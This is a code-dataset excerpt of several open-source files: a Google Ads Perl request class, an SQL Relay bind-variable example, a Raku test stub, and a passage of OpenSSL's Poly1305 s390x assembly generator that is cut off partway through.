] | null | null | null | lib/Google/Ads/GoogleAds/V3/Services/CampaignService/GetCampaignRequest.pm | PierrickVoulet/google-ads-perl | bc9fa2de22aa3e11b99dc22251d90a1723dd8cc4 | [
"Apache-2.0"
] | null | null | null | lib/Google/Ads/GoogleAds/V3/Services/CampaignService/GetCampaignRequest.pm | PierrickVoulet/google-ads-perl | bc9fa2de22aa3e11b99dc22251d90a1723dd8cc4 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020, Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
package Google::Ads::GoogleAds::V3::Services::CampaignService::GetCampaignRequest;
use strict;
use warnings;
use base qw(Google::Ads::GoogleAds::BaseEntity);
use Google::Ads::GoogleAds::Utils::GoogleAdsHelper;
sub new {
my ($class, $args) = @_;
my $self = {resourceName => $args->{resourceName}};
# Delete the unassigned fields in this object for a more concise JSON payload
remove_unassigned_fields($self, $args);
bless $self, $class;
return $self;
}
1;
| 29.971429 | 82 | 0.739752 |
ed05f398c069f4bbefd038b43ce839f2ecf06501 | 535 | pl | Perl | doc/programming/parts/perl-reexecute.pl | cryptoboxcomics/sqlrelay-1.6.0_amber | bda2d52edeb6afb25744b22e2841b105b1e4cd01 | [
"PHP-3.01",
"CC-BY-3.0"
] | 16 | 2018-04-23T09:58:33.000Z | 2022-01-31T13:40:20.000Z | doc/programming/parts/perl-reexecute.pl | cryptoboxcomics/sqlrelay-1.6.0_amber | bda2d52edeb6afb25744b22e2841b105b1e4cd01 | [
"PHP-3.01",
"CC-BY-3.0"
] | null | null | null | doc/programming/parts/perl-reexecute.pl | cryptoboxcomics/sqlrelay-1.6.0_amber | bda2d52edeb6afb25744b22e2841b105b1e4cd01 | [
"PHP-3.01",
"CC-BY-3.0"
] | 4 | 2020-12-23T12:17:54.000Z | 2022-01-04T20:46:34.000Z | use SQLRelay::Connection;
use SQLRelay::Cursor;
$con=SQLRelay::Connection->new("sqlrserver",9000,"/tmp/example.socket","user","password",0,1);
$cur=SQLRelay::Cursor->new($con);
$cur->prepareQuery("select * from mytable where mycolumn>:value");
$cur->inputBind("value",1);
$cur->executeQuery();
... process the result set ...
$cur->clearBinds();
$cur->inputBind("value",5);
$cur->executeQuery();
... process the result set ...
$cur->clearBinds();
$cur->inputBind("value",10);
$cur->executeQuery();
... process the result set ...
| 22.291667 | 94 | 0.676636 |
ed9b32cb37224dec1191e4d7195653e4b9c48cdb | 73 | t | Perl | t/01-basic.t | moznion/panda-watcher | 8b7dc6a7eab0719d1c76e6a1fed9d3d7dab9aad1 | [
"Artistic-2.0"
] | null | null | null | t/01-basic.t | moznion/panda-watcher | 8b7dc6a7eab0719d1c76e6a1fed9d3d7dab9aad1 | [
"Artistic-2.0"
] | null | null | null | t/01-basic.t | moznion/panda-watcher | 8b7dc6a7eab0719d1c76e6a1fed9d3d7dab9aad1 | [
"Artistic-2.0"
] | null | null | null | use v6;
use Test;
use panda::watcher;
pass "replace me";
done-testing;
| 9.125 | 19 | 0.69863 |
73efdd9e6d5c797d3a90d58dfa87a4976b40d67d | 24,453 | pl | Perl | crypto/poly1305/asm/poly1305-s390x.pl | JemmyLoveJenny/openssl | f8922b5107d098c78f846c8c999f96111345de8d | [
"Apache-2.0"
] | 2 | 2019-07-29T08:08:47.000Z | 2019-07-29T08:08:51.000Z | crypto/poly1305/asm/poly1305-s390x.pl | JemmyLoveJenny/openssl | f8922b5107d098c78f846c8c999f96111345de8d | [
"Apache-2.0"
] | 2 | 2020-11-05T14:41:39.000Z | 2021-08-11T20:29:26.000Z | crypto/poly1305/asm/poly1305-s390x.pl | JemmyLoveJenny/openssl | f8922b5107d098c78f846c8c999f96111345de8d | [
"Apache-2.0"
] | 1 | 2019-07-14T17:25:17.000Z | 2019-07-14T17:25:17.000Z | #! /usr/bin/env perl
# Copyright 2016 The OpenSSL Project Authors. All Rights Reserved.
#
# Licensed under the Apache License 2.0 (the "License"). You may not use
# this file except in compliance with the License. You can obtain a copy
# in the file LICENSE in the source distribution or at
# https://www.openssl.org/source/license.html
#
# ====================================================================
# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
# project. The module is, however, dual licensed under OpenSSL and
# CRYPTOGAMS licenses depending on where you obtain it. For further
# details see http://www.openssl.org/~appro/cryptogams/.
# ====================================================================
#
# This module implements Poly1305 hash for s390x.
#
# June 2015
#
# ~6.6/2.3 cpb on z10/z196+, >2x improvement over compiler-generated
# code. For older compiler improvement coefficient is >3x, because
# then base 2^64 and base 2^32 implementations are compared.
#
# On side note, z13 enables vector base 2^26 implementation...
#
# January 2019
#
# Add vx code path (base 2^26).
#
# Copyright IBM Corp. 2019
# Author: Patrick Steuer <patrick.steuer@de.ibm.com>
#
# January 2019
#
# Add vector base 2^26 implementation. It's problematic to accurately
# measure performance, because reference system is hardly idle. But
# it's sub-cycle, i.e. less than 1 cycle per processed byte, and it's
# >=20% faster than IBM's submission on long inputs, and much faster on
# short ones, because calculation of key powers is postponed till we
# know that input is long enough to justify the additional overhead.
use strict;
use FindBin qw($Bin);
use lib "$Bin/../..";
use perlasm::s390x qw(:DEFAULT :LD :GE :EI :MI1 :VX AUTOLOAD LABEL INCLUDE);
my $flavour = shift;
my ($z,$SIZE_T);
if ($flavour =~ /3[12]/) {
$z=0; # S/390 ABI
$SIZE_T=4;
} else {
$z=1; # zSeries ABI
$SIZE_T=8;
}
my $output;
while (($output=shift) && ($output!~/\w[\w\-]*\.\w+$/)) {}
my $stdframe=16*$SIZE_T+4*8;
my $sp="%r15";
my ($ctx,$inp,$len,$padbit) = map("%r$_",(2..5));
PERLASM_BEGIN($output);
INCLUDE ("s390x_arch.h");
TEXT ();
################
# static void poly1305_init(void *ctx, const unsigned char key[16])
{
GLOBL ("poly1305_init");
TYPE ("poly1305_init","\@function");
ALIGN (16);
LABEL ("poly1305_init");
lghi ("%r0",0);
lghi ("%r1",-1);
stg ("%r0","0($ctx)"); # zero hash value
stg ("%r0","8($ctx)");
stg ("%r0","16($ctx)");
st ("%r0","24($ctx)"); # clear is_base2_26
lgr ("%r5",$ctx); # reassign $ctx
lghi ("%r2",0);
&{$z? \&clgr:\&clr} ($inp,"%r0");
je (".Lno_key");
lrvg ("%r2","0($inp)"); # load little-endian key
lrvg ("%r3","8($inp)");
nihl ("%r1",0xffc0); # 0xffffffc0ffffffff
srlg ("%r0","%r1",4); # 0x0ffffffc0fffffff
srlg ("%r1","%r1",4);
nill ("%r1",0xfffc); # 0x0ffffffc0ffffffc
ngr ("%r2","%r0");
ngr ("%r3","%r1");
stmg ("%r2","%r3","32(%r5)");
larl ("%r1","OPENSSL_s390xcap_P");
lg ("%r0","16(%r1)");
srlg ("%r0","%r0",62);
nill ("%r0",1); # extract vx bit
lcgr ("%r0","%r0");
larl ("%r1",".Lpoly1305_blocks");
larl ("%r2",".Lpoly1305_blocks_vx");
larl ("%r3",".Lpoly1305_emit");
&{$z? \&xgr:\&xr} ("%r2","%r1"); # select between scalar and vector
&{$z? \&ngr:\&nr} ("%r2","%r0");
&{$z? \&xgr:\&xr} ("%r2","%r1");
&{$z? \&stmg:\&stm} ("%r2","%r3","0(%r4)");
lghi ("%r2",1);
LABEL (".Lno_key");
br ("%r14");
SIZE ("poly1305_init",".-poly1305_init");
}
################
# static void poly1305_blocks(void *ctx, const unsigned char *inp,
# size_t len, u32 padbit)
{
my ($d0hi,$d0lo,$d1hi,$d1lo,$t0,$h0,$t1,$h1,$h2) = map("%r$_",(6..14));
my ($r0,$r1,$s1) = map("%r$_",(0..2));
GLOBL ("poly1305_blocks");
TYPE ("poly1305_blocks","\@function");
ALIGN (16);
LABEL ("poly1305_blocks");
LABEL (".Lpoly1305_blocks");
&{$z? \<gr:\<r} ("%r0",$len);
jz (".Lno_data");
&{$z? \&stmg:\&stm} ("%r6","%r14","6*$SIZE_T($sp)");
lg ($h0,"0($ctx)"); # load hash value
lg ($h1,"8($ctx)");
lg ($h2,"16($ctx)");
LABEL (".Lpoly1305_blocks_entry");
if ($z) {
srlg ($len,$len,4);
} else {
srl ($len,4);
}
llgfr ($padbit,$padbit); # clear upper half, much needed with
# non-64-bit ABI
lg ($r0,"32($ctx)"); # load key
lg ($r1,"40($ctx)");
&{$z? \&stg:\&st} ($ctx,"2*$SIZE_T($sp)"); # off-load $ctx
srlg ($s1,$r1,2);
algr ($s1,$r1); # s1 = r1 + r1>>2
j (".Loop");
ALIGN (16);
LABEL (".Loop");
lrvg ($d0lo,"0($inp)"); # load little-endian input
lrvg ($d1lo,"8($inp)");
la ($inp,"16($inp)");
algr ($d0lo,$h0); # accumulate input
alcgr ($d1lo,$h1);
alcgr ($h2,$padbit);
lgr ($h0,$d0lo);
mlgr ($d0hi,$r0); # h0*r0 -> $d0hi:$d0lo
lgr ($h1,$d1lo);
mlgr ($d1hi,$s1); # h1*5*r1 -> $d1hi:$d1lo
mlgr ($t0,$r1); # h0*r1 -> $t0:$h0
mlgr ($t1,$r0); # h1*r0 -> $t1:$h1
algr ($d0lo,$d1lo);
lgr ($d1lo,$h2);
alcgr ($d0hi,$d1hi);
lghi ($d1hi,0);
algr ($h1,$h0);
alcgr ($t1,$t0);
msgr ($d1lo,$s1); # h2*s1
msgr ($h2,$r0); # h2*r0
algr ($h1,$d1lo);
alcgr ($t1,$d1hi); # $d1hi is zero
algr ($h1,$d0hi);
alcgr ($h2,$t1);
lghi ($h0,-4); # final reduction step
ngr ($h0,$h2);
srlg ($t0,$h2,2);
algr ($h0,$t0);
lghi ($t1,3);
ngr ($h2,$t1);
algr ($h0,$d0lo);
alcgr ($h1,$d1hi); # $d1hi is still zero
alcgr ($h2,$d1hi); # $d1hi is still zero
&{$z? \&brctg:\&brct} ($len,".Loop");
&{$z? \&lg:\&l} ($ctx,"2*$SIZE_T($sp)");# restore $ctx
stg ($h0,"0($ctx)"); # store hash value
stg ($h1,"8($ctx)");
stg ($h2,"16($ctx)");
&{$z? \&lmg:\&lm} ("%r6","%r14","6*$SIZE_T($sp)");
LABEL (".Lno_data");
br ("%r14");
SIZE ("poly1305_blocks",".-poly1305_blocks");
}
################
# static void poly1305_blocks_vx(void *ctx, const unsigned char *inp,
# size_t len, u32 padbit)
{
my ($H0, $H1, $H2, $H3, $H4) = map("%v$_",(0..4));
my ($I0, $I1, $I2, $I3, $I4) = map("%v$_",(5..9));
my ($R0, $R1, $S1, $R2, $S2) = map("%v$_",(10..14));
my ($R3, $S3, $R4, $S4) = map("%v$_",(15..18));
my ($ACC0, $ACC1, $ACC2, $ACC3, $ACC4) = map("%v$_",(19..23));
my ($T1, $T2, $T3, $T4) = map("%v$_",(24..27));
my ($mask26,$bswaplo,$bswaphi,$bswapmi) = map("%v$_",(28..31));
my ($d2,$d0,$h0,$d1,$h1,$h2)=map("%r$_",(9..14));
TYPE ("poly1305_blocks_vx","\@function");
ALIGN (16);
LABEL ("poly1305_blocks_vx");
LABEL (".Lpoly1305_blocks_vx");
&{$z? \&clgfi:\&clfi} ($len,128);
jhe ("__poly1305_blocks_vx");
&{$z? \&stmg:\&stm} ("%r6","%r14","6*$SIZE_T($sp)");
lg ($d0,"0($ctx)");
lg ($d1,"8($ctx)");
lg ($d2,"16($ctx)");
llgfr ("%r0",$d0); # base 2^26 -> base 2^64
srlg ($h0,$d0,32);
llgfr ("%r1",$d1);
srlg ($h1,$d1,32);
srlg ($h2,$d2,32);
sllg ("%r0","%r0",26);
algr ($h0,"%r0");
sllg ("%r0",$h1,52);
srlg ($h1,$h1,12);
sllg ("%r1","%r1",14);
algr ($h0,"%r0");
alcgr ($h1,"%r1");
sllg ("%r0",$h2,40);
srlg ($h2,$h2,24);
lghi ("%r1",0);
algr ($h1,"%r0");
alcgr ($h2,"%r1");
llgf ("%r0","24($ctx)"); # is_base2_26
lcgr ("%r0","%r0");
xgr ($h0,$d0); # choose between radixes
xgr ($h1,$d1);
xgr ($h2,$d2);
ngr ($h0,"%r0");
ngr ($h1,"%r0");
ngr ($h2,"%r0");
xgr ($h0,$d0);
xgr ($h1,$d1);
xgr ($h2,$d2);
lhi ("%r0",0);
st ("%r0","24($ctx)"); # clear is_base2_26
j (".Lpoly1305_blocks_entry");
SIZE ("poly1305_blocks_vx",".-poly1305_blocks_vx");
TYPE ("__poly1305_mul","\@function");
ALIGN (16);
LABEL ("__poly1305_mul");
vmlof ($ACC0,$H0,$R0);
vmlof ($ACC1,$H0,$R1);
vmlof ($ACC2,$H0,$R2);
vmlof ($ACC3,$H0,$R3);
vmlof ($ACC4,$H0,$R4);
vmalof ($ACC0,$H1,$S4,$ACC0);
vmalof ($ACC1,$H1,$R0,$ACC1);
vmalof ($ACC2,$H1,$R1,$ACC2);
vmalof ($ACC3,$H1,$R2,$ACC3);
vmalof ($ACC4,$H1,$R3,$ACC4);
vmalof ($ACC0,$H2,$S3,$ACC0);
vmalof ($ACC1,$H2,$S4,$ACC1);
vmalof ($ACC2,$H2,$R0,$ACC2);
vmalof ($ACC3,$H2,$R1,$ACC3);
vmalof ($ACC4,$H2,$R2,$ACC4);
vmalof ($ACC0,$H3,$S2,$ACC0);
vmalof ($ACC1,$H3,$S3,$ACC1);
vmalof ($ACC2,$H3,$S4,$ACC2);
vmalof ($ACC3,$H3,$R0,$ACC3);
vmalof ($ACC4,$H3,$R1,$ACC4);
vmalof ($ACC0,$H4,$S1,$ACC0);
vmalof ($ACC1,$H4,$S2,$ACC1);
vmalof ($ACC2,$H4,$S3,$ACC2);
vmalof ($ACC3,$H4,$S4,$ACC3);
vmalof ($ACC4,$H4,$R0,$ACC4);
################################################################
# lazy reduction
vesrlg ($H4,$ACC3,26);
vesrlg ($H1,$ACC0,26);
vn ($H3,$ACC3,$mask26);
vn ($H0,$ACC0,$mask26);
vag ($H4,$H4,$ACC4); # h3 -> h4
vag ($H1,$H1,$ACC1); # h0 -> h1
vesrlg ($ACC4,$H4,26);
vesrlg ($ACC1,$H1,26);
vn ($H4,$H4,$mask26);
vn ($H1,$H1,$mask26);
vag ($H0,$H0,$ACC4);
vag ($H2,$ACC2,$ACC1); # h1 -> h2
veslg ($ACC4,$ACC4,2); # <<2
vesrlg ($ACC2,$H2,26);
vn ($H2,$H2,$mask26);
vag ($H0,$H0,$ACC4); # h4 -> h0
vag ($H3,$H3,$ACC2); # h2 -> h3
vesrlg ($ACC0,$H0,26);
vesrlg ($ACC3,$H3,26);
vn ($H0,$H0,$mask26);
vn ($H3,$H3,$mask26);
vag ($H1,$H1,$ACC0); # h0 -> h1
vag ($H4,$H4,$ACC3); # h3 -> h4
br ("%r14");
SIZE ("__poly1305_mul",".-__poly1305_mul");
TYPE ("__poly1305_blocks_vx","\@function");
ALIGN (16);
LABEL ("__poly1305_blocks_vx");
&{$z? \&lgr:\&lr} ("%r0",$sp);
&{$z? \&stmg:\&stm} ("%r10","%r15","10*$SIZE_T($sp)");
if (!$z) {
std ("%f4","16*$SIZE_T+2*8($sp)");
std ("%f6","16*$SIZE_T+3*8($sp)");
ahi ($sp,-$stdframe);
st ("%r0","0($sp)"); # back-chain
llgfr ($len,$len); # so that srlg works on $len
} else {
aghi ($sp,"-($stdframe+8*8)");
stg ("%r0","0($sp)"); # back-chain
std ("%f8","$stdframe+0*8($sp)");
std ("%f9","$stdframe+1*8($sp)");
std ("%f10","$stdframe+2*8($sp)");
std ("%f11","$stdframe+3*8($sp)");
std ("%f12","$stdframe+4*8($sp)");
std ("%f13","$stdframe+5*8($sp)");
std ("%f14","$stdframe+6*8($sp)");
std ("%f15","$stdframe+7*8($sp)");
}
larl ("%r1",".Lconst");
vgmg ($mask26,38,63);
vlm ($bswaplo,$bswapmi,"16(%r1)");
< ("%r0","24($ctx)"); # is_base2_26?
jnz (".Lskip_init");
lg ($h0,"32($ctx)"); # load key base 2^64
lg ($h1,"40($ctx)");
risbg ($d0,$h0,38,0x80+63,38); # base 2^64 -> 2^26
srlg ($d1,$h0,52);
risbg ($h0,$h0,38,0x80+63,0);
vlvgg ($R0,$h0,0);
risbg ($d1,$h1,38,51,12);
vlvgg ($R1,$d0,0);
risbg ($d0,$h1,38,63,50);
vlvgg ($R2,$d1,0);
srlg ($d1,$h1,40);
vlvgg ($R3,$d0,0);
vlvgg ($R4,$d1,0);
veslg ($S1,$R1,2);
veslg ($S2,$R2,2);
veslg ($S3,$R3,2);
veslg ($S4,$R4,2);
vlr ($H0,$R0);
vlr ($H1,$R1);
vlr ($H2,$R2);
vlr ($H3,$R3);
vlr ($H4,$R4);
vag ($S1,$S1,$R1); # * 5
vag ($S2,$S2,$R2);
vag ($S3,$S3,$R3);
vag ($S4,$S4,$R4);
brasl ("%r14","__poly1305_mul"); # r^1:- * r^1:-
vpdi ($R0,$H0,$R0,0); # r^2:r^1
vpdi ($R1,$H1,$R1,0);
vpdi ($R2,$H2,$R2,0);
vpdi ($R3,$H3,$R3,0);
vpdi ($R4,$H4,$R4,0);
vpdi ($H0,$H0,$H0,0); # r^2:r^2
vpdi ($H1,$H1,$H1,0);
vpdi ($H2,$H2,$H2,0);
vpdi ($H3,$H3,$H3,0);
vpdi ($H4,$H4,$H4,0);
veslg ($S1,$R1,2);
veslg ($S2,$R2,2);
veslg ($S3,$R3,2);
veslg ($S4,$R4,2);
vag ($S1,$S1,$R1); # * 5
vag ($S2,$S2,$R2);
vag ($S3,$S3,$R3);
vag ($S4,$S4,$R4);
brasl ("%r14,__poly1305_mul"); # r^2:r^2 * r^2:r^1
vl ($I0,"0(%r1)"); # borrow $I0
vperm ($R0,$R0,$H0,$I0); # r^2:r^4:r^1:r^3
vperm ($R1,$R1,$H1,$I0);
vperm ($R2,$R2,$H2,$I0);
vperm ($R3,$R3,$H3,$I0);
vperm ($R4,$R4,$H4,$I0);
veslf ($S1,$R1,2);
veslf ($S2,$R2,2);
veslf ($S3,$R3,2);
veslf ($S4,$R4,2);
vaf ($S1,$S1,$R1); # * 5
vaf ($S2,$S2,$R2);
vaf ($S3,$S3,$R3);
vaf ($S4,$S4,$R4);
lg ($h0,"0($ctx)"); # load hash base 2^64
lg ($h1,"8($ctx)");
lg ($h2,"16($ctx)");
vzero ($H0);
vzero ($H1);
vzero ($H2);
vzero ($H3);
vzero ($H4);
risbg ($d0,$h0,38,0x80+63,38); # base 2^64 -> 2^26
srlg ($d1,$h0,52);
risbg ($h0,$h0,38,0x80+63,0);
vlvgg ($H0,$h0,0);
risbg ($d1,$h1,38,51,12);
vlvgg ($H1,$d0,0);
risbg ($d0,$h1,38,63,50);
vlvgg ($H2,$d1,0);
srlg ($d1,$h1,40);
vlvgg ($H3,$d0,0);
risbg ($d1,$h2,37,39,24);
vlvgg ($H4,$d1,0);
lhi ("%r0",1);
st ("%r0","24($ctx)"); # set is_base2_26
vstm ($R0,$S4,"48($ctx)"); # save key schedule base 2^26
vpdi ($R0,$R0,$R0,0); # broadcast r^2:r^4
vpdi ($R1,$R1,$R1,0);
vpdi ($S1,$S1,$S1,0);
vpdi ($R2,$R2,$R2,0);
vpdi ($S2,$S2,$S2,0);
vpdi ($R3,$R3,$R3,0);
vpdi ($S3,$S3,$S3,0);
vpdi ($R4,$R4,$R4,0);
vpdi ($S4,$S4,$S4,0);
j (".Loaded_hash");
ALIGN (16);
LABEL (".Lskip_init");
vllezf ($H0,"0($ctx)"); # load hash base 2^26
vllezf ($H1,"4($ctx)");
vllezf ($H2,"8($ctx)");
vllezf ($H3,"12($ctx)");
vllezf ($H4,"16($ctx)");
vlrepg ($R0,"0x30($ctx)"); # broadcast r^2:r^4
vlrepg ($R1,"0x40($ctx)");
vlrepg ($S1,"0x50($ctx)");
vlrepg ($R2,"0x60($ctx)");
vlrepg ($S2,"0x70($ctx)");
vlrepg ($R3,"0x80($ctx)");
vlrepg ($S3,"0x90($ctx)");
vlrepg ($R4,"0xa0($ctx)");
vlrepg ($S4,"0xb0($ctx)");
LABEL (".Loaded_hash");
vzero ($I1);
vzero ($I3);
vlm ($T1,$T4,"0x00($inp)"); # load first input block
la ($inp,"0x40($inp)");
vgmg ($mask26,6,31);
vgmf ($I4,5,5); # padbit<<2
vperm ($I0,$T3,$T4,$bswaplo);
vperm ($I2,$T3,$T4,$bswapmi);
vperm ($T3,$T3,$T4,$bswaphi);
verimg ($I1,$I0,$mask26,6); # >>26
veslg ($I0,$I0,32);
veslg ($I2,$I2,28); # >>4
verimg ($I3,$T3,$mask26,18); # >>14
verimg ($I4,$T3,$mask26,58); # >>38
vn ($I0,$I0,$mask26);
vn ($I2,$I2,$mask26);
vesrlf ($I4,$I4,2); # >>2
vgmg ($mask26,38,63);
vperm ($T3,$T1,$T2,$bswaplo);
vperm ($T4,$T1,$T2,$bswaphi);
vperm ($T2,$T1,$T2,$bswapmi);
verimg ($I0,$T3,$mask26,0);
verimg ($I1,$T3,$mask26,38); # >>26
verimg ($I2,$T2,$mask26,60); # >>4
verimg ($I3,$T4,$mask26,50); # >>14
vesrlg ($T4,$T4,40);
vo ($I4,$I4,$T4);
srlg ("%r0",$len,6);
&{$z? \&aghi:\&ahi} ("%r0",-1);
ALIGN (16);
LABEL (".Loop_vx");
vmlef ($ACC0,$I0,$R0);
vmlef ($ACC1,$I0,$R1);
vmlef ($ACC2,$I0,$R2);
vmlef ($ACC3,$I0,$R3);
vmlef ($ACC4,$I0,$R4);
vmalef ($ACC0,$I1,$S4,$ACC0);
vmalef ($ACC1,$I1,$R0,$ACC1);
vmalef ($ACC2,$I1,$R1,$ACC2);
vmalef ($ACC3,$I1,$R2,$ACC3);
vmalef ($ACC4,$I1,$R3,$ACC4);
vaf ($H2,$H2,$I2);
vaf ($H0,$H0,$I0);
vaf ($H3,$H3,$I3);
vaf ($H1,$H1,$I1);
vaf ($H4,$H4,$I4);
vmalef ($ACC0,$I2,$S3,$ACC0);
vmalef ($ACC1,$I2,$S4,$ACC1);
vmalef ($ACC2,$I2,$R0,$ACC2);
vmalef ($ACC3,$I2,$R1,$ACC3);
vmalef ($ACC4,$I2,$R2,$ACC4);
vlm ($T1,$T4,"0x00($inp)"); # load next input block
la ($inp,"0x40($inp)");
vgmg ($mask26,6,31);
vmalef ($ACC0,$I3,$S2,$ACC0);
vmalef ($ACC1,$I3,$S3,$ACC1);
vmalef ($ACC2,$I3,$S4,$ACC2);
vmalef ($ACC3,$I3,$R0,$ACC3);
vmalef ($ACC4,$I3,$R1,$ACC4);
vperm ($I0,$T3,$T4,$bswaplo);
vperm ($I2,$T3,$T4,$bswapmi);
vperm ($T3,$T3,$T4,$bswaphi);
vmalef ($ACC0,$I4,$S1,$ACC0);
vmalef ($ACC1,$I4,$S2,$ACC1);
vmalef ($ACC2,$I4,$S3,$ACC2);
vmalef ($ACC3,$I4,$S4,$ACC3);
vmalef ($ACC4,$I4,$R0,$ACC4);
verimg ($I1,$I0,$mask26,6); # >>26
veslg ($I0,$I0,32);
veslg ($I2,$I2,28); # >>4
verimg ($I3,$T3,$mask26,18); # >>14
vmalof ($ACC0,$H0,$R0,$ACC0);
vmalof ($ACC1,$H0,$R1,$ACC1);
vmalof ($ACC2,$H0,$R2,$ACC2);
vmalof ($ACC3,$H0,$R3,$ACC3);
vmalof ($ACC4,$H0,$R4,$ACC4);
vgmf ($I4,5,5); # padbit<<2
verimg ($I4,$T3,$mask26,58); # >>38
vn ($I0,$I0,$mask26);
vn ($I2,$I2,$mask26);
vesrlf ($I4,$I4,2); # >>2
vmalof ($ACC0,$H1,$S4,$ACC0);
vmalof ($ACC1,$H1,$R0,$ACC1);
vmalof ($ACC2,$H1,$R1,$ACC2);
vmalof ($ACC3,$H1,$R2,$ACC3);
vmalof ($ACC4,$H1,$R3,$ACC4);
vgmg ($mask26,38,63);
vperm ($T3,$T1,$T2,$bswaplo);
vperm ($T4,$T1,$T2,$bswaphi);
vperm ($T2,$T1,$T2,$bswapmi);
vmalof ($ACC0,$H2,$S3,$ACC0);
vmalof ($ACC1,$H2,$S4,$ACC1);
vmalof ($ACC2,$H2,$R0,$ACC2);
vmalof ($ACC3,$H2,$R1,$ACC3);
vmalof ($ACC4,$H2,$R2,$ACC4);
verimg ($I0,$T3,$mask26,0);
verimg ($I1,$T3,$mask26,38); # >>26
verimg ($I2,$T2,$mask26,60); # >>4
vmalof ($ACC0,$H3,$S2,$ACC0);
vmalof ($ACC1,$H3,$S3,$ACC1);
vmalof ($ACC2,$H3,$S4,$ACC2);
vmalof ($ACC3,$H3,$R0,$ACC3);
vmalof ($ACC4,$H3,$R1,$ACC4);
verimg ($I3,$T4,$mask26,50); # >>14
vesrlg ($T4,$T4,40);
vo ($I4,$I4,$T4);
vmalof ($ACC0,$H4,$S1,$ACC0);
vmalof ($ACC1,$H4,$S2,$ACC1);
vmalof ($ACC2,$H4,$S3,$ACC2);
vmalof ($ACC3,$H4,$S4,$ACC3);
vmalof ($ACC4,$H4,$R0,$ACC4);
################################################################
# lazy reduction as discussed in "NEON crypto" by D.J. Bernstein
# and P. Schwabe
vesrlg ($H4,$ACC3,26);
vesrlg ($H1,$ACC0,26);
vn ($H3,$ACC3,$mask26);
vn ($H0,$ACC0,$mask26);
vag ($H4,$H4,$ACC4); # h3 -> h4
vag ($H1,$H1,$ACC1); # h0 -> h1
vesrlg ($ACC4,$H4,26);
vesrlg ($ACC1,$H1,26);
vn ($H4,$H4,$mask26);
vn ($H1,$H1,$mask26);
vag ($H0,$H0,$ACC4);
vag ($H2,$ACC2,$ACC1); # h1 -> h2
veslg ($ACC4,$ACC4,2); # <<2
vesrlg ($ACC2,$H2,26);
vn ($H2,$H2,$mask26);
vag ($H0,$H0,$ACC4); # h4 -> h0
vag ($H3,$H3,$ACC2); # h2 -> h3
vesrlg ($ACC0,$H0,26);
vesrlg ($ACC3,$H3,26);
vn ($H0,$H0,$mask26);
vn ($H3,$H3,$mask26);
vag ($H1,$H1,$ACC0); # h0 -> h1
vag ($H4,$H4,$ACC3); # h3 -> h4
&{$z? \&brctg:\&brct} ("%r0",".Loop_vx");
vlm ($R0,$S4,"48($ctx)"); # load all powers
lghi ("%r0",0x30);
&{$z? \&lcgr:\&lcr} ($len,$len);
&{$z? \&ngr:\&nr} ($len,"%r0");
&{$z? \&slgr:\&slr} ($inp,$len);
LABEL (".Last");
vmlef ($ACC0,$I0,$R0);
vmlef ($ACC1,$I0,$R1);
vmlef ($ACC2,$I0,$R2);
vmlef ($ACC3,$I0,$R3);
vmlef ($ACC4,$I0,$R4);
vmalef ($ACC0,$I1,$S4,$ACC0);
vmalef ($ACC1,$I1,$R0,$ACC1);
vmalef ($ACC2,$I1,$R1,$ACC2);
vmalef ($ACC3,$I1,$R2,$ACC3);
vmalef ($ACC4,$I1,$R3,$ACC4);
vaf ($H0,$H0,$I0);
vaf ($H1,$H1,$I1);
vaf ($H2,$H2,$I2);
vaf ($H3,$H3,$I3);
vaf ($H4,$H4,$I4);
vmalef ($ACC0,$I2,$S3,$ACC0);
vmalef ($ACC1,$I2,$S4,$ACC1);
vmalef ($ACC2,$I2,$R0,$ACC2);
vmalef ($ACC3,$I2,$R1,$ACC3);
vmalef ($ACC4,$I2,$R2,$ACC4);
vmalef ($ACC0,$I3,$S2,$ACC0);
vmalef ($ACC1,$I3,$S3,$ACC1);
vmalef ($ACC2,$I3,$S4,$ACC2);
vmalef ($ACC3,$I3,$R0,$ACC3);
vmalef ($ACC4,$I3,$R1,$ACC4);
vmalef ($ACC0,$I4,$S1,$ACC0);
vmalef ($ACC1,$I4,$S2,$ACC1);
vmalef ($ACC2,$I4,$S3,$ACC2);
vmalef ($ACC3,$I4,$S4,$ACC3);
vmalef ($ACC4,$I4,$R0,$ACC4);
vmalof ($ACC0,$H0,$R0,$ACC0);
vmalof ($ACC1,$H0,$R1,$ACC1);
vmalof ($ACC2,$H0,$R2,$ACC2);
vmalof ($ACC3,$H0,$R3,$ACC3);
vmalof ($ACC4,$H0,$R4,$ACC4);
vmalof ($ACC0,$H1,$S4,$ACC0);
vmalof ($ACC1,$H1,$R0,$ACC1);
vmalof ($ACC2,$H1,$R1,$ACC2);
vmalof ($ACC3,$H1,$R2,$ACC3);
vmalof ($ACC4,$H1,$R3,$ACC4);
vmalof ($ACC0,$H2,$S3,$ACC0);
vmalof ($ACC1,$H2,$S4,$ACC1);
vmalof ($ACC2,$H2,$R0,$ACC2);
vmalof ($ACC3,$H2,$R1,$ACC3);
vmalof ($ACC4,$H2,$R2,$ACC4);
vmalof ($ACC0,$H3,$S2,$ACC0);
vmalof ($ACC1,$H3,$S3,$ACC1);
vmalof ($ACC2,$H3,$S4,$ACC2);
vmalof ($ACC3,$H3,$R0,$ACC3);
vmalof ($ACC4,$H3,$R1,$ACC4);
vmalof ($ACC0,$H4,$S1,$ACC0);
vmalof ($ACC1,$H4,$S2,$ACC1);
vmalof ($ACC2,$H4,$S3,$ACC2);
vmalof ($ACC3,$H4,$S4,$ACC3);
vmalof ($ACC4,$H4,$R0,$ACC4);
################################################################
# horizontal addition
vzero ($H0);
vsumqg ($ACC0,$ACC0,$H0);
vsumqg ($ACC1,$ACC1,$H0);
vsumqg ($ACC2,$ACC2,$H0);
vsumqg ($ACC3,$ACC3,$H0);
vsumqg ($ACC4,$ACC4,$H0);
################################################################
# lazy reduction
vesrlg ($H4,$ACC3,26);
vesrlg ($H1,$ACC0,26);
vn ($H3,$ACC3,$mask26);
vn ($H0,$ACC0,$mask26);
vag ($H4,$H4,$ACC4); # h3 -> h4
vag ($H1,$H1,$ACC1); # h0 -> h1
vesrlg ($ACC4,$H4,26);
